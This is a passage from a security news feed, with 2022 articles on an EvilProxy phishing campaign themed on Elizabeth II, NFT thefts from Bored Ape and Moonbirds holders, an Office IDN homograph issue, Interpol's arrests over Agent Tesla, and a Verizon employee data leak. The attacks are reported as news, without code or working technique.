Proofpoint (cybersecurity company) has detected fraudulent emails where cybercriminals pose as the Microsoft team to try to deceive recipients, thus getting victims to sign a virtual book of condolences in memory of Elizabeth II.

By clicking on the link included in the phishing email, those affected are redirected to a fraudulent page where they are asked to enter their email passwords. In addition to Microsoft credentials, the attackers also try to steal multi-factor authentication (MFA) codes in order to gain control of the victims’ accounts.

Scam message. Source: Proofpoint

In this scam, cybercriminals use a phishing framework called EvilProxy to reverse-proxy landing pages to each recipient, harvest credentials, and bypass MFA protection.

The death of Elizabeth II has become a social engineering theme for scammers, since it only requires manipulating the emotional state of users. In this case, the attackers play on the victims’ grief: they create spaces to share comments and memories in honor of the queen with the intention of scamming users.

How bored Ape NFTs are being hacked again and again. 200 ETH stolen https://www.securitynewspaper.com/2022/06/06/how-bored-ape-nfts-are-being-hacked-again-and-again-200-eth-stolen/ Mon, 06 Jun 2022 22:20:14 +0000 https://www.securitynewspaper.com/?p=25378

The post How bored Ape NFTs are being hacked again and again. 200 ETH stolen appeared first on Information Security Newspaper | Hacking News.

Yuga Labs, creators of the popular non-fungible token (NFT) collection Bored Ape Yacht Club (BAYC), confirmed the detection of the second cyberattack that targeted its systems in less than a month, an incident that generated losses of around 200 ETH, or about $350,000.

The attack was first reported by on-chain analyst OKHotshot, who posted on Twitter to alert the community to what had happened. In a first tweet, the researcher mentioned that the BAYC and OtherSide metaverse Discord accounts had been compromised by threat actors.

Once the attackers gained access to these platforms, they posted a message targeting the NFT community offering purported exclusive giveaways for BAYC and Otherside token holders: “We are releasing another exclusive giveaway to all our holders listed above”, read the message, posted alongside a link to a phishing website.

As users may remember, phishing is an online identity theft technique in which scammers trick victims into revealing their confidential information using malicious websites. In the world of cryptocurrencies and NFTs, cybercriminals use these websites to gain access to victims’ online wallets and transfer the virtual assets to their own accounts.

Shortly after the researcher released the alert, Yuga Labs acknowledged that its Discord servers had been successfully attacked: “The team caught the incident and quickly addressed it. It seems that about 200 ETH in NFT had been affected. We’re still investigating, but if you were affected, please email us”.

Lousy background

As mentioned above, this is the second attack against Yuga Labs in just two months; the first incident was reported in mid-April, through the hacking of BAYC’s official Instagram account to post a malicious link that allowed the theft of 91 “apes”. The attackers responsible for this theft also used a link to a fake BAYC website promoting an alleged giveaway; once affected users entered their information, their virtual assets were transferred to addresses controlled by the hackers.

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.

How to hide spoofed malicious domain when users hover above a link in a phishing email in Microsoft Outlook, Word or Excel document? https://www.securitynewspaper.com/2022/06/03/how-to-hide-spoofed-malicious-domain-when-users-hover-above-a-link-in-a-phishing-email-in-microsoft-outlook-word-or-excel-document/ Fri, 03 Jun 2022 20:43:26 +0000 https://www.securitynewspaper.com/?p=25372

The post How to hide spoofed malicious domain when users hover above a link in a phishing email in Microsoft Outlook, Word or Excel document? appeared first on Information Security Newspaper | Hacking News.

A recent report indicates that Microsoft Office applications could be exposed to homograph attacks based on internationalized domain names (IDNs). In a successful attack, a target user hovering over a link in a phishing email or in a Word or Excel document could be automatically redirected to a malicious domain.

The report, by Bitdefender, mentions: “Users in a position to validate a link in an email client before clicking on it will be susceptible to clicking on it because it has not yet been translated into a real domain name in their browser. The actual domain name would only be seen after the page has started to open.”

The term IDN refers to domain names that, in whole or in part, use characters from a non-Latin script or alphabet encoded by the Unicode standard. For the Domain Name System (DNS) to interpret them correctly, IDNs are stored in the DNS as ASCII strings using Punycode transcription.

Counterfeit IDN homograph domains can be created by combining letters from different alphabets that look so similar to the user that they cannot be told apart, even though Unicode treats them as separate characters. This is not a new concept, but it remains a problem for many users.

Most browsers, for example, show the Punycode form of an internationalized domain name in the address bar (https://xn--n1aag8f.com, for example) instead of its Unicode display form (https://žugec.com) if the site looks suspicious. Office applications, including Outlook, however, display the name differently.

Since domain registration verification greatly limits which counterfeit domains can be registered, and most browsers display the Punycode form of a spoofed IDN domain, IDN homograph attacks have ceased to be a constant cybersecurity threat, although threat actors may still find ways to deploy these attacks on a large scale.

Microsoft acknowledged the problem when it received the Bitdefender report, though it is unclear whether the issue will be fixed. Until it is resolved, endpoint security solutions and IP and URL reputation services can help by blocking most suspicious domains.


Interpol arrests hackers who attacked oil and gas companies worldwide: Operation Killer Bee https://www.securitynewspaper.com/2022/05/31/interpol-arrests-hackers-who-attacked-oil-and-gas-companies-worldwide-operation-killer-bee/ Tue, 31 May 2022 16:32:21 +0000 https://www.securitynewspaper.com/?p=25349

The post Interpol arrests hackers who attacked oil and gas companies worldwide: Operation Killer Bee appeared first on Information Security Newspaper | Hacking News.

Interpol announced that Operation Killer Bee, deployed in collaboration with authorities in 11 countries in South Asia, led to the arrest of three Nigerian nationals accused of using a remote access Trojan (RAT) to divert funds and steal access credentials from affected organizations. This cybercriminal group operated from Lagos, Nigeria, and reportedly attacked multiple oil and gas companies in the Middle East, North Africa, and Southeast Asia, stealing an undetermined amount.

One of those arrested faces charges of possession of fraudulent documents, impersonation, and obtaining money with false claims, and could spend more than three years in prison. The other two defendants face only one count of possession of fraudulent documents, which Interpol believes they would have used in a business email compromise (BEC) campaign.

SOURCE: Interpol

During the arrest of the three individuals, laptops and smartphones used for this fraudulent operation were confiscated, allowing law enforcement to discover that the hackers were using the RAT known as Agent Tesla. This malware variant allows information theft, keystroke logging, and theft of credentials stored in web browsers, email clients, and other platforms.

SOURCE: Interpol

The defendants allegedly used Agent Tesla to steal credentials in the targeted organizations, in addition to accessing internal emails and maintaining constant surveillance of employees in these companies. The collection of information about the target is a fundamental part of a BEC attack since threat actors need to know the processes, standards, and actors involved in the processes of the affected organizations.

Cybersecurity specialists report that Agent Tesla has become one of the most widely used malware variants today, above other variants such as AveMaria, Formbook, Lokibot, RedLine, and Wakbot.

In recent days, Interpol also collaborated in the arrest of the alleged leader of SilverTerrier, another BEC operation allegedly run by cybercriminals in Nigeria.


Full names, IDs, email addresses, and phone numbers of hacked Verizon employees: Customers could experience increased SIM swap attacks https://www.securitynewspaper.com/2022/05/30/full-names-ids-email-addresses-and-phone-numbers-of-hacked-verizon-employees-customers-could-experience-increased-sim-swap-attacks/ Mon, 30 May 2022 23:00:54 +0000 https://www.securitynewspaper.com/?p=25346

The post Full names, IDs, email addresses, and phone numbers of hacked Verizon employees: Customers could experience increased SIM swap attacks appeared first on Information Security Newspaper | Hacking News.

A report from Motherboard details the detection of a data breach affecting the telephone company Verizon, an incident that would have put at risk the personal records of thousands of employees. The leak would include employees’ full names, corporate IDs, email addresses, and phone numbers.

Even though Verizon was notified and has already acknowledged the leak, its representatives deny that the compromised information poses a security threat to its employees and customers.

The alleged hackers behind this incident claimed that it was very easy for them to access this database, as they simply had to contact a Verizon employee and pose as a co-worker in the internal support area. After fooling this unsuspecting employee, the hackers were able to connect to Verizon’s internal tool and access sensitive information.

Once in the database, the hacker reported having created a tool that allowed them to download the information stored in the company’s systems. Verizon soon received a ransom note threatening to expose the compromised information if a $250,000 ransom was not paid.

Not a security risk?

As mentioned above, a Verizon representative stated that the company does not consider the compromised records to be confidential information, so it does not plan to negotiate any ransom with the hackers. The representative added that Verizon takes information security seriously and has the best measures in place to protect its customers’ and employees’ data.

Information security specialists disagree with Verizon’s stance: while the leak does not involve passwords, bank records, or social security numbers, the stolen data could still prove useful to multiple hacking groups. Phishing campaigns, phone fraud, SIM swapping, and email spam are just some of the risks to which those affected could be exposed.


Hackers theft over $1.4 million worth of Moonbird NFT collection https://www.securitynewspaper.com/2022/05/26/hackers-theft-over-1-4-million-worth-of-moonbird-nft-collection/ Thu, 26 May 2022 23:28:50 +0000 https://www.securitynewspaper.com/?p=25332

The post Hackers theft over $1.4 million worth of Moonbird NFT collection appeared first on Information Security Newspaper | Hacking News.

A non-fungible token (NFT) collector lost more than $1.4 million due to a cyberattack involving a malicious website and social engineering tactics. As reported by blockchain researchers known as Andeh and Cirrus, the victim lost 29 NFTs from the Moonbirds collection, with a minimum value of $48,000 each.

In an interview with Vice, the victim, simply known as Keith, claims that hackers tricked him into visiting a specially designed phishing website: “The site had a smart contract to move all my Moonbirds in one swoop; although at first, the transactions failed, they finally materialized.”

Keith, who says he is an oncologist, husband, and father of three, claims he decided to invest his life savings in NFTs, only to see these assets disappear in a matter of minutes.

He added that hackers used a Twitter account to contact him a few weeks ago. After the initial contact, Keith continued to interact with the scammers until he received an offer to sell his Moonbirds collection; the account used by the hackers has already been deleted.

The victim sent a message to the hackers, hoping to recover his collection: “Please return the stolen moonbirds to the original owner. Keep one as compensation.”

The collector adds that, if his tokens are not returned before this weekend, he will notify the FBI about the incident.

Common issues

NFT collectors have become frequent victims of ambitious phishing and social engineering campaigns, as this is a vector of quick and easy access to virtual collections worth tens of thousands of dollars.

The researcher Tal Be’ery analyzed this attack and concluded that the operation turned out to be complicated for the hackers: they tried to use a smart contract so as to leave no trace, and when that attempt failed, the cybercriminals simply used a conventional address to divert the stolen tokens.

